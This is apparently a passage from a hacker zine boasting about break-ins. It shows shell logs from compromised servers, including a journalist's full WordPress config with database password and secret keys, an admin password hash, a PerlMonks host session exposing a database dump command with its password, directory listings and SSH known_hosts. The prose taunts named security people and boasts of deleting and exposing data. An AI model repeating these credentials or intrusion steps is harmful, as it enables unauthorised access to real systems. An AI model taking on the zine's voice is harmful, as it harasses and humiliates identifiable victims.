drwx--x--x  5 wtfsmilez  wtfsmilez  4096 May  2 13:11 wtfsmilez
drwx--x--x  8 xckx	 xckx	    4096 Feb 22 02:44 xckx
drwx--x--x  5 yourkicks  yourkicks  4096 Jan 28 21:21 yourkicks
drwx--x--x  5 zer0	 zer0	    4096 May 23 01:28 zer0
root@server2:/home/zer0/domains[root@server2 domains]# ls -la /home/*/domains/
/home/aaa/domains/:
total 12
drwx--x--x 3 aaa aaa 4096 Sep 14  2007 .
drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 ..
drwx--x--x 8 aaa aaa 4096 Sep 14  2007 aaasoda.com

/home/admin/domains/:
total 20
drwx--x--x 5 admin admin 4096 Jan 12 14:29 .
drwx--x--x 6 admin admin 4096 Jan 12 14:29 ..
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 default
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 sharedip
drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 suspended

/home/beyond/domains/:
total 12
drwx--x--x 3 beyond beyond 4096 Sep 12	2007 .
drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 ..
drwx--x--x 8 beyond beyond 4096 Feb  6	2008 beyond-comparison.com

/home/bloo/domains/:
total 12
drwx--x--x 3 bloo bloo 4096 May 23 02:04 .
drwx--x--x 4 bloo bloo 4096 May 23 02:04 ..
drwx--x--x 6 bloo bloo 4096 May 23 02:04 bloohacks.com

/home/bootroot/domains/:
total 20
drwx--x--x 5 bootroot bootroot 4096 May 12 21:27 .
drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 ..
drwx--x--x 8 bootroot bootroot 4096 May  9 18:57 bootforfun.com
drwx--x--x 7 bootroot bootroot 4096 Mar  2 00:11 bootforfun.net
drwx--x--x 7 bootroot bootroot 4096 May 13 00:10 bootforfun.org

/home/dablitz/domains/:
total 16
drwx--x--x 4 dablitz dablitz 4096 Jan  3 23:34 .
drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 ..
drwx--x--x 8 dablitz dablitz 4096 Jan 17 10:32 blitzcraze.com
drwx--x--x 8 dablitz dablitz 4096 Jan 24 07:14 blitzdownloads.com
/home/dakilla/domains/:
total 12
drwxr-xr-x 3 dakilla dakilla 4096 May 16 07:49 .
drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 ..
drwxr-xr-x 8 dakilla dakilla 4096 Feb 15 00:11 scionbot.com

/home/furiogamin/domains/:
total 20
drwx--x--x 5 furiogamin furiogamin 4096 Feb 19 06:57 .
drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 ..
drwx--x--x 8 furiogamin furiogamin 4096 Feb 18 11:04 furiogaming.com
drwx--x--x 7 furiogamin furiogamin 4096 Dec 27 21:11 furiogaming.net
drwx--x--x 5 furiogamin furiogamin 4096 Apr 10 13:14 softmodding.net

/home/h3mod/domains/:
total 12
drwx--x--x 3 h3mod h3mod 4096 Jan 18  2008 .
drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 ..
drwx--x--x 8 h3mod h3mod 4096 Oct  2  2008 h3mod.com

/home/haiobr/domains/:
total 12
drwxr-xr-x 3 haiobr haiobr 4096 May  1 14:26 .
drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 ..
drwxr-xr-x 9 haiobr haiobr 4096 May  1 14:26 super-syn.net

/home/hbxmike/domains/:
total 16
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 .
drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 ..
drwx--x--x 7 hbxmike hbxmike 4096 May 12 00:11 hackordie.net
drwx--x--x 8 hbxmike hbxmike 4096 Apr 29 00:10 wesellstuff.biz

/home/hotglow/domains/:
total 12
drwxr-xr-x 3 hotglow hotglow 4096 Sep  3  2007 .
drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 ..
drwxr-xr-x 8 hotglow hotglow 4096 Sep  3  2007 hotglowneon.com

/home/hrdev/domains/:
total 12
drwxr-xr-x 3 hrdev hrdev 4096 Dec  2 19:31 .
drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 ..
drwxr-xr-x 8 hrdev hrdev 4096 Dec 10  2007 hr-development.net

/home/hstrike/domains/:
total 12
drwx--x--x 3 hstrike hstrike 4096 Apr 24  2008 .
drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 ..
drwx--x--x 8 hstrike hstrike 4096 Oct 31  2008 halostrike.com

/home/kaza/domains/:
total 28
drwx--x--x 7 kaza kaza 4096 Apr 25 15:46 .
drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 ..
drwx--x--x 7 kaza kaza 4096 Jan  6 21:14 crypticgamers.com
drwx--x--x 7 kaza kaza 4096 Jan  5 21:13 crypticgamers.net
drwx--x--x 7 kaza kaza 4096 Jan 15 21:12 godlymods.com
drwx--x--x 7 kaza kaza 4096 May  4 08:50 kindclan.co.cc
drwx--x--x 7 kaza kaza 4096 Feb  4 00:10 mortonnetworks.com

/home/keytraderz/domains/:
total 20
drwx--x--x 5 keytraderz keytraderz 4096 Jan 18 21:18 .
drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 ..
drwx--x--x 8 keytraderz keytraderz 4096 Jan  5 21:20 1nesolution.com
drwx--x--x 8 keytraderz keytraderz 4096 Jan 13 21:16 gotmovies.net
drwx--x--x 8 keytraderz keytraderz 4096 Jan  2 21:15 keytraderz.com

/home/mrgod/domains/:
total 12
drwx--x--x 3 mrgod mrgod 4096 May 14 19:46 .
drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 ..
drwx--x--x 7 mrgod mrgod 4096 May 15 00:11 international-gaming.net

/home/odin/domains/:
total 12
drwx--x--x 3 odin odin 4096 May  2 04:09 .
drwx--x--x 5 odin odin 4096 May  8 05:01 ..
drwx--x--x 7 odin odin 4096 May 15 08:14 evilzone.ws

/home/pagewiz/domains/:
total 12
drwx--x--x 3 pagewiz pagewiz 4096 May 18 18:08 .
drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 ..
drwx--x--x 8 pagewiz pagewiz 4096 May 19 00:10 pagewizzstudio.com

/home/penguin/domains/:
total 12
drwx--x--x 3 penguin penguin 4096 Dec 20 11:24 .
drwx--x--x 6 penguin penguin 4096 Mar  8 18:49 ..
drwx--x--x 7 penguin penguin 4096 Dec 20 21:12 phylumstudios.com

/home/pimpinjg/domains/:
total 16
drwx--x--x 4 pimpinjg pimpinjg 4096 Mar 26 16:13 .
drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 ..
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 26 16:13 h4ckinab0x.com
drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 27 00:11 teamhbx.com

/home/ristop/domains/:
total 12
drwx--x--x 3 ristop ristop 4096 May 22 13:33 .
drwx--x--x 5 ristop ristop 4096 May 22 15:33 ..
drwx--x--x 8 ristop ristop 4096 May 23 00:10 centosservers.com

/home/romeo/domains/:
total 16
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com

/home/sam/domains/:
total 12
drwx--x--x 3 sam sam 4096 May 12 09:00 .
drwx--x--x 4 sam sam 4096 May 12 09:26 ..
drwx--x--x 8 sam sam 4096 May 13 00:11 metus-project.com

/home/scraft758/domains/:
total 24
drwx--x--x 6 scraft758 scraft758 4096 Apr 16 20:03 .
drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 ..
drwx--x--x 7 scraft758 scraft758 4096 Jan 27 21:12 mods4hire.com
drwx--x--x 7 scraft758 scraft758 4096 Mar 25  2008 samcraft.com
drwx--x--x 7 scraft758 scraft758 4096 Mar 25  2008 samcraft.net
drwx--x--x 7 scraft758 scraft758 4096 Oct 28  2008 theconsolejunkies.com

/home/wheelglow/domains/:
total 12
drwx--x--x 3 wheelglow wheelglow 4096 Sep 12  2007 .
drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 ..
drwx--x--x 8 wheelglow wheelglow 4096 Sep 12  2007 wheelglow.com

/home/wtfsmilez/domains/:
total 12
drwx--x--x 3 wtfsmilez wtfsmilez 4096 Apr 30 17:00 .
drwx--x--x 5 wtfsmilez wtfsmilez 4096 May  2 13:11 ..
drwx--x--x 8 wtfsmilez wtfsmilez 4096 May  3 19:12 wtfgamers.net

/home/xckx/domains/:
total 16
drwx--x--x 4 xckx xckx 4096 Feb 22 02:44 .
drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 ..
drwx--x--x 7 xckx xckx 4096 Apr 16  2008 oinfam0uso.com
drwx--x--x 7 xckx xckx 4096 Feb 23 00:12 snayke.com

/home/yourkicks/domains/:
total 16
drwx--x--x 4 yourkicks yourkicks 4096 Jan  6 19:33 .
drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 ..
drwx--x--x 8 yourkicks yourkicks 4096 Jan  6 21:15 yourkicksonline.com
drwx--x--x 8 yourkicks yourkicks 4096 Jan  6 21:15 yourkicksonline.net

/home/zer0/domains/:
total 12
drwx--x--x 3 zer0 zer0 4096 May 20 17:00 .
drwx--x--x 5 zer0 zer0 4096 May 23 01:28 ..
drwx--x--x 8 zer0 zer0 4096 May 23 01:28 zer0zone.ws

Ghetto.



                                           |
                                       \       /            _\/_
    Robert Lemos - Again                 .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     I'm homeless, jobless, times is hard                           |
       I'm not hopeless, but I gotta eat regardless
         No family to run to I'm 22
           Now tell me what the fuck am I supposed to do

Hack to the future!

Remember the intro where we talked about notable whitehats we owned? Lemos
isn't one of them. He's just a whitehat that we like to mess with who writes
for securityfocus.

We dropped Lemos in our last issue, but his typical lame whitehat retorts were
so funny we thought we'd try to squeeze another out of him. He also called us
hacker rats, which is totally NOT cool.

Here's his list of potential ways we got in last time.

    * An unpublished or unpatched flaw in Wordpress that they exploited.
        # no comment
    * An unpublished or unpatched flaw in PHP.
        # no comment
    * The site was compromised by a known flaw before I had installed the
      latest patch.
        # no comment
    * The attackers were able to brute force the password for the administrator
      account using a hash for my particular password culled from a previous
      compromise at a different site where I owned an account.
        # why bother brute forcing? and doesn't that mean you reuse passwords?
        sucker.
    * A misconfiguration in the site allowed the attackers to escalate
      privileges.
        # no comment.

Bob will be helping us out by spreading the zine around to a few publicists, we
really are after a movie/book deal eventually and figure he's the right guy to
help us out.

$ id; uname -a
uid=80(apache) gid=80(apache) groups=80(apache)
Linux rs2cruz.nexcess.net 2.6.9-78.0.22.ELsmp #1 SMP Thu Apr 30 19:14:39 EDT
2009 i686 i686 i386 GNU/Linux
$ cd /home/robertle/public_html/; ls -la
total 308
drwxr-sr-x  5 robertle robertle  4096 Mar 24 17:31 .
drwx--s--x  4 robertle robertle  4096 May 13  2008 ..
-r--r--r--  1 robertle robertle   169 May 12  2008 .htaccess
-rw-r--r--  1 robertle robertle   397 Jul 10 10:09 index.php
-rw-r--r--  1 robertle robertle 15410 Jul 10 10:09 license.txt
-rw-r--r--  1 robertle robertle  7642 Jul 10 10:09 readme.html
drwxr-sr-x  7 robertle robertle  4096 Jul  6 09:40 wp-admin
-rw-r--r--  1 robertle robertle 40543 Jul 10 10:10 wp-app.php
-rw-r--r--  1 robertle robertle   220 Jul 10 10:10 wp-atom.php
-rw-r--r--  1 robertle robertle   274 Jul 10 10:10 wp-blog-header.php
-rw-r--r--  1 robertle robertle  3649 Jul 10 10:10 wp-comments-post.php
-rw-r--r--  1 robertle robertle   238 Jul 10 10:10 wp-commentsrss2.php
-rw-r--r--  1 robertle robertle  2601 Jan  7  2009 wp-config.php
-rw-r--r--  1 robertle robertle  2626 Jul 10 10:10 wp-config-sample.php
drwxr-sr-x  5 robertle robertle  4096 Mar 24 17:30 wp-content
-rw-r--r--  1 robertle robertle  1254 Jul 10 10:10 wp-cron.php
-rw-r--r--  1 robertle robertle   220 Jul 10 10:10 wp-feed.php
drwxr-sr-x  6 robertle robertle  4096 Jul  6 09:41 wp-includes
-rw-r--r--  1 robertle robertle  1946 Jul 10 10:11 wp-links-opml.php
-rw-r--r--  1 robertle robertle  2341 Jul 10 10:11 wp-load.php
-rw-r--r--  1 robertle robertle 21019 Jul 10 10:11 wp-login.php
-rw-r--r--  1 robertle robertle  7113 Jul 10 10:11 wp-mail.php
-rw-r--r--  1 robertle robertle   487 Jul 10 10:11 wp-pass.php
-rw-r--r--  1 robertle robertle   218 Jul 10 10:11 wp-rdf.php
-rw-r--r--  1 robertle robertle   316 Jul 10 10:11 wp-register.php
-rw-r--r--  1 robertle robertle   220 Jul 10 10:11 wp-rss2.php
-rw-r--r--  1 robertle robertle   218 Jul 10 10:11 wp-rss.php
-rw-r--r--  1 robertle robertle 21520 Jul 10 10:11 wp-settings.php
-rw-r--r--  1 robertle robertle  3434 Jul 10 10:11 wp-trackback.php
-rw-r--r--  1 robertle robertle 92522 Jul 10 10:11 xmlrpc.php
$ cat /home/robertle/public_html/wp-config.php
/** 
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'robertle_wordpress');

/** MySQL database username */
define('DB_USER', 'robertle_wp2008');

/** MySQL database password */
define('DB_PASSWORD', 's9e#hy%isjUI7@4kdfh+_dijfb');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link
http://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
 *
 * @since 2.6.0
 */
define('AUTH_KEY',
'~JX*S.)[@UJ8pTg,Qb\"_M7$0#-zd0-sux-A8$MEJ0;e)@Zr|1t{k@N@tA>:acZ2r@*(is<aRg');
define('SECURE_AUTH_KEY', 'i1D2k++|pZM;HsQ\'JUaHo3RyT7R-zd0-sux-D&D7uGV[s[
Sa1NI/4zeM92?C%W.#r/gb:vZ');
define('LOGGED_IN_KEY',
':d(e%LYH.>=lzuhz1<v67^-zd0-sux-T{RNWv:Wtf>Mfz8R4[\'G>W/%y%v_5l4Sh``9m7 &RJ');
define('NONCE_KEY', 'fhsdf87f9sFD&*(W#HV*(&F(D98f7f32hif98dsh2ncdsuiufoiseh');
/**#@-*/


// You guys see that? zd0-sux...who is this zd0 and what have they done to
// bother you, little Bobby?


/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a
unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * WordPress Localized Language, defaults to English.
 *
 * Change this to localize WordPress.  A corresponding MO file for the chosen
 * language must be installed to wp-content/languages. For example, install
 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
 * language support.
 */
define ('WPLANG', '');

/* That's all, stop editing! Happy blogging. */

/** WordPress absolute path to the Wordpress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
?>

Little Bobby rm'd all the users from his blog :( including n3td3v :(

(1,'admin','$P$BEXt/0MTFOcYugwh/IaZ.V2f5ntHe/.','administrator','feedback@rober
tlemos.com','http://www.robertlemos.com','2005-03-30 00:17:34','',0,'Rob');

No point dragging this out. Lemos knows nothing about security, not a single
jot. Real whitehat hackers laugh at this guy, much in the same way they laugh
at what ends up in these zines. Mock us at your peril Bob. One other thing -
get the name right.



                                           |
                                       \       /            _\/_
    Interlude                            .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
                                                                    |


The security industry needs a security industry. 

If we wanted to we could make good money selling security to the people who
sell security. It really makes their business look bad when they cannot begin
to secure themselves. Surely their own security would be as valuable as that of
most of their clients. But we don't do that, probably because we'd get canned
after rming our first few clients.

Look at Matasano. 0wned to fuck just a couple of days ago. What the hell guys?
Blog posts lecturing about how noobs misuse AES and crypto sessions, meanwhile
we read your hacklog and see a handful of blatant security mistakes. Did you
go to the Dan Kaminsky school of system administration? Get your shit in order
and then come back for review.

---


We remove your files. We play blackjack with your hard drives; hit me and flip
that bit. We exp0se your secrets. We expose your girlfriend. Relationships end.
Files disappear. Careers change. Mood swings. End.

It's all real. We can't get out either.

We're addicted. It's a disease. Somebody please invent hacker rehab. If you
charge SyScan rates we'll fuckin' own you.

There we go again.

---


Death to narc bitches like Axel Gamebe. They're everywhere. Snitchin' on a
snitch there's nothing to tell.

---


> 0rg4nizations such as th3 eleetz "anti-sec" 4re s4diztic g0dless bastardz 
  wh0 g41n org4smic pl34sure from the suff3ring and t0rrm3nt of def3nclezz jpg 
  f1lez

---


> I owned too much shit not sure wtf to do with it all :(
> maybe shutdown the internet lolz

ZF06 will only be available in paperback and hardcover.

---


Between us and people we know, everything is owned. We keep owning shit that
others have, they own some shit we already have. We don't exactly hire
secretaries to sort this out.

We're colonizing the internet the way Europe colonized Africa, cutting it up
into little pieces. We have your accounts, your mail, your dev box, your host,
and your ISP. Code exec on your lappy if we think it's worth the hassle. We
have so much shit owned we can't manage, or even remember, half of it. Targets
pop up and we have to ask ourselves if we already have it, because we just
don't know.

We could set up franchises like McDonalds, one on every corner of the net, over
99 billion served. Supplying you with artery-clogging hax morning afternoon and
night.

We need some goddamn staff, we're a billion dollar enterprise running on a
lemonade stand budget. If there was much useful help out there, we'd hand out
root passes like candy on hallowe'en. That's just a pipe dream, we just find
more people we can't trust. Anyone useful is as busy as we are. Thank your 
lucky stars we ramble on.

---


It's only good enough for cutting sausage.

---


Poor Mil. Let's just say we ended up on another box with a milamber account.
I screamed, exited, and killed the last hop I connected from. Just to be safe.

We have a funny feeling we'll be hacking Mil forever, he's stalking us or we
are stalking him. We can't get away. We'll end up in the same retirement home.

---


  "Secure DNA's own Anthony Giandomenico was named a Security Hero 
   by SANS on February 18th"

When do we get one of those?

---


                                           |
                                       \       /            _\/_
    PerlMonks                            .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     I stand up next to a mountain                                  |
       and chop it down with the edge of my hand.
         'cause I'm a vudu child


There is a really simple reason we owned PerlMonks: we couldn't resist more
than 50,000 unencrypted programmer passwords.

That's right, unhashed. Just sitting in the database. From which they save
convenient backups for us.

Believe it or not, there is actually debate at perlmonks about whether or not
this is a good idea. Let's just settle the argument right now and say it was
an idea that children with mental disabilities would be smart enough to scoff
at. We considered patching this for you but we were just too busy and lazy. 
I'm sure you can figure it out yourselves.

This isn't a bad set of passwords, either. Programmers have access to
interesting things. These Perl guys are alright, just a little dumb apparently.
A lot of them reuse. You can explore them yourselves, I really do not want to 
point out anyone in particular. 
 
We are really tight on space in this zine, so here's a little log of one of
their pair.com boxes.

%id
uid=3002(perlmonk) gid=1000(users) groups=1000(users), 2(kmem), 861(mysql)
%w
 8:17PM  up 69 days, 3 hrs, 0 users, load averages: 0.00, 0.01, 0.00
USER		 TTY	  FROM		    LOGIN@  IDLE WHAT
%uname -a
FreeBSD qs275.pair.com 4.8-STABLE FreeBSD 4.8-STABLE #0: Fri Apr 15 13:34:52
EDT 2005     erik5@koloda.pair.com:/usr/src/sys/compile/PAIRqsv  i386
%pwd
/usr/home/perlmonk
%ls
0.8mods       dmq   mysqldumper     
	 pm-restore		      sqltop.2002-05.gz 	temp
6000				downloads		       mysqlscript4ar0n
	processlist		      sqltop.2002-11.gz 	thatguy.txt
Everything.tgz			e			       nateperl        
	public_html		      sqltop.2002.gz			theorb
Mail				eraseme 		       nodecount.txt   
	 r			      sqltop.2003.gz		       
tp.tar.gz
ar0n.dump.gz			html.tags		       nodecount10.txt 
	 schema.txt		      sqltop.2004-01.gz 	tye
ar0n.out.gz			html.tye		       nodetype.tsv    
	 script-launcher		sqltop.2004.gz		       
user_bashrc.tar
arf				jona			      
numnodes_by_date.txt	  show			       sqltop.kill	       
	 vroom
backups 			jwest_user_image.sql	      
perlmonks_move.gz	  slowbup.all		       sqltop.last	       
	 www_logs
belgfix 			links.pl		      
perlmonks_move2.gz	  slowbup.log		       sqltop.log	       
	 ysth
bin				mail			      
perlmonks_post_migrate_dump.gz	 someoldbackup		 table.status
dead.letter			mbox			       petruchio       
	 sql20050707.log		tabledefs
%ls vroom
Algorithm-Diff-1.11		eclonealtertable	       hitspersec.pl   
	 htmlfix4		      public_html		       
vroom_smgrad.gif
Algorithm-Diff-1.11a.tar	ecore			       htmlcodecheck   
	 htmlfixupdate		      resume.doc
addnewlines.pl			errorpage.html		       htmlcodecheck2  
	 identity.pub		      resume.html
bin				gatesfix		       htmlfix.pl      
	 newmods			scannedpics
dev				greenperlmonkssm.gif	       htmlfix2        
	offeringplate.jpg	      test.pl
ebase				greensearch.gif 	       htmlfix3        
	oldhome 		      users_localtime.pl
%cat mysqldumper 
#!/bin/csh
mysqldump -u perlmonk_2 -pYPZge9wP perlmonk_ebase | /usr/local/bin/bzip2 >
/home/perlmonk/backups/pmdump00.bz2
%ls -lat /
total 18204
drwxrwxrwt   4 bin   bin       2560 May 20 00:34 tmp
-rw-------   1 root  wheel	  0 May 14 17:17 .history
drwxr-x---  18 root  wheel     4608 May  7 16:34 root
drwxr-xr-x   9 root  wheel     3072 May  7 16:34 etc
drwxr-xr-x  29 root  wheel     1024 Mar  7  2007 usr
drwxr-xr-x  16 root  wheel     1536 Oct 28  2006 ..
drwxr-xr-x  16 root  wheel     1536 Oct 28  2006 .
-rw-r--r--   1 root  wheel	 29 Oct 28  2006 .Synced.reference
drwxr-xr-x  22 root  wheel	512 Oct 28  2006 var
drwx------   9 root  wheel     1024 Apr 30  2006 .Trash
drwx------   2 root  wheel	512 Apr 30  2006 .46
drwxr-x---   3 root  staff	512 Apr 30  2006 hot
lrwxrwxrwx   1 root  wheel	  3 Apr 20  2006 u2 -> usr
lrwxrwxrwx   1 root  wheel	 11 Apr 20  2006 sys -> usr/src/sys
lrwxrwxrwx   1 root  wheel	 10 Apr 20  2006 proc -> /root/proc
lrwxrwxrwx   1 root  wheel	  9 Apr 20  2006 home -> /usr/home
lrwxrwxrwx   1 root  wheel	 11 Apr 20  2006 compat -> /usr/compat
drwxr-xr-x   3 root  wheel    21504 Apr 20  2006 dev
-rwxr-xr-x   2 root  wheel  2372281 Apr 15  2005 kernel.PAIRqsv
-rwxr-xr-x   2 root  wheel  2372281 Apr 15  2005 kernel
-rwxr-xr-x   1 root  wheel  2372249 Apr  5  2005 kernel.PAIRqsu
-rw-r--r--   1 root  wheel  2372249 Apr  4  2005 kernel.PAIRqu
-rwxr-xr-x   1 root  wheel  2372249 Nov 27  2004 kernel.PAIRqst
-rwxr-xr-x   1 root  staff  2318536 Sep 15  2004 kernel.PAIRqsr
drwxr-xr-x   2 root  wheel     1024 Nov 13  2003 bin
-rwxr-xr-x   1 root  staff  4242214 Nov 13  2003 kernel.GENERIC
drwxr-x---   2 root  wheel     4096 Sep  6  2003 modules
drwxr-x---   3 root  wheel	512 Jul 14  2003 boot
drwxr-xr-x   2 root  wheel     2048 Jul 14  2003 sbin
drwxr-x---   4 root  wheel     1024 Apr  3  2002 stand
-r--r--r--   1 root  wheel     4735 Sep 18  2001 COPYRIGHT
-rw-r-----   1 root  wheel	251 Sep 18  2001 .profile
-rw-r--r--   1 root  staff	780 Apr  9  2001 clnup
-rw-r-----   1 root  wheel     1048 Feb 21  2001 .cshrc
%pwd
/usr/home/perlmonk
%cat .ssh/known_hosts 
everything2.com,216.200.201.214 1024 37
1504346935309162227843615336249193222801199395982740647984659154407241244938512
0139893376417128249437061753041368877049908960458365469976611014638765436506536
4767878034301276065705242772106632208765649947664830375681246847078843085559748
059130243054854416032553484978530430912104909353314827360882837653291387
krishna.blockstackers.com,208.159.115.231 1024 35
1367053699308799741209020445599587202775550019320470446282274276038653826504324
3568954222612627907140352515737632875778087092943432629226318545309874525663759
3539502643956278722685859732518793593719789170386499644176421281826121927380351
259006719337723183627544705605924101804027414647023235484860521830129361
perlmonk.org,66.92.212.9 1024 35
1554200963592370980112950903510278623058920496993920919408633278174837859976268
0813593311386105308496357011598169878112802686574903167118450168553769815415087
5971618386463870272158136400666057193163929369538400688439301601057560369897342
336957411976856029704598603482732241786293049086082335808452519743332579
zdog.dyndns.org,216.175.114.84 1024 35
1245708086324349460448475625675905773779649436293702492073303510718172589884216
6410944701960540689725543797716107817683609389799103940991295840793754270172137
7895523010320845339729980355179840314983887993306076503254869054326039382987386
901371000132964181153163683541880716088071439874560799412444503607762399
qs343,216.92.131.131 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwdeMdSJ94Ivgu2Dk6oLgxZFTM4Hur1CQwhuzBbke/od11kpJDRS
9Rdxn2GhId5ku3+PUcfevD+YTbkGhhXTN8zAqLXuc7MGTL4oGrf1rAlg6nX3tNjMlMAY/Ua7N6fDGYx
BtNaWWgR5YPzLCokiZDnXkdh3RpJ1GxW4Fg+JdgkM=
qs321,216.92.131.76 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA3Ip2A/Bmit6NdnTw9XXA/qbLsLAqZinGyL52Xz1RJ2HW6TfTNye
9GW3B2TyCOv7Fq9TD0f2Uj1M/kXteZlDIM5cTH9C2cOXAUp0oFMwG8OlMjWSNDdLl9XmRpqSMtX6qtH
3RDE/7rKb9Nwm367juJyDBqKaRUfOa2q6cmBCdgM0=
tmn.dyndns.org,65.32.49.163 ssh-dss
AAAAB3NzaC1kc3MAAACBALOmC9FSmnNXPKRCB0x204Yy6XQZxCbeckBanUsjSV1QIW3vdQyFJgAz+PK
/973uTmdW4SC4fKl1IdzQTWGNjgSltfdQ6rwS/Ut91x1pXs7+vD26Y+2UdjKBEULl/5QLoT0fUsK5L1
t+Vf1DvPZIldm+qWaxUc20SwfvsP4FkJl1AAAAFQCGU1xS/LIFjL0yR4+Ig7nzeOmEowAAAIBKkidlt
rRbTCbRNG3IkVhAw9zzy0BSL/T9Kq9ohhQ9wDP9p41amkpRc2y6cNBEpb1HQL/edtrPpPWy4OtaE6h/
H/0i6vhMz/8Bsqus9ZZPCpT1W6WpGmtkbms2SIJkxfSdD+xfIfHnjWh9uvKRcc/4kWhS0WqYylaKhyI
NGhdMvAAAAIEAsvZkDOP8e/6JXMwA6wcrXY5yTXWEaVmp4lJ4xLc4jAGBJ+KGNAtXVodQINExKdfiEJ
01BY2ZWtDx1WcnxxEfaX0Qefs5nMV2wUIGtfxdncmqvUndJ0ms8OmjPXH1x2bsVz+0BHVF4XYim7CyI
F2f4xWkeZjQI6sn7655yC9PsW4=
animefu.com,216.200.201.210 1024 35
1378578634601798455530109190103249845851774542111646477236260924699170332641550
1456294768164749564017670780284976178523747420102817478862186023466191082260844
6301995428477411508563531280528087580443481443108591122471474705113922461561157
203099013215493718444291836570990158395245241432844302454316726540939781
qs321.pair.com ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA3Ip2A/Bmit6NdnTw9XXA/qbLsLAqZinGyL52Xz1RJ2HW6TfTNye
9GW3B2TyCOv7Fq9TD0f2Uj1M/kXteZlDIM5cTH9C2cOXAUp0oFMwG8OlMjWSNDdLl9XmRpqSMtX6qtH
3RDE/7rKb9Nwm367juJyDBqKaRUfOa2q6cmBCdgM0=
qs343.pair.com ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwdeMdSJ94Ivgu2Dk6oLgxZFTM4Hur1CQwhuzBbke/od11kpJDRS
9Rdxn2GhId5ku3+PUcfevD+YTbkGhhXTN8zAqLXuc7MGTL4oGrf1rAlg6nX3tNjMlMAY/Ua7N6fDGYx
BtNaWWgR5YPzLCokiZDnXkdh3RpJ1GxW4Fg+JdgkM=
perlmonk.org,66.92.212.9 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAr0a0JHWnD1DtO9a66GyvaTaY5uolozgim+zcWIRbZ6vj5WcneJy
0RcGjNfKGgUWcs4S5UR3UaITHFEIYqbg/3VQFwJ86+H4/Jc3MoeK1pY1f6ETZmHzUlDq0Vh1e9oNapp
tfB8sGeCFejKZGul9tQhUDZgdf/t2BQBREtWxTvKs=
qs275.pair.com,216.92.131.31 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA3pwfd2S22hPt68KgDz8uymsCt641XTB/oht/51ysqYZSLV3FLhs
2bMm9X6/QBbVVmeD6apF2uV0pCxH1PK666VvXpzpwbCd+jutLjrJI5DqXiqaSY1f/afDWaT8ohSgAP+
VUTSfPeyQdvEjxUYGISWiGmG4LIvqNr+s+wR27IWM=
kilowog.blockstackers.com,216.144.199.194 ssh-dss
AAAAB3NzaC1kc3MAAACBAIPjiVdonWUyBUKX+ikssiyTjyu5fF1xWTk3vzsmeCv4jckN7WVO4qelLe4
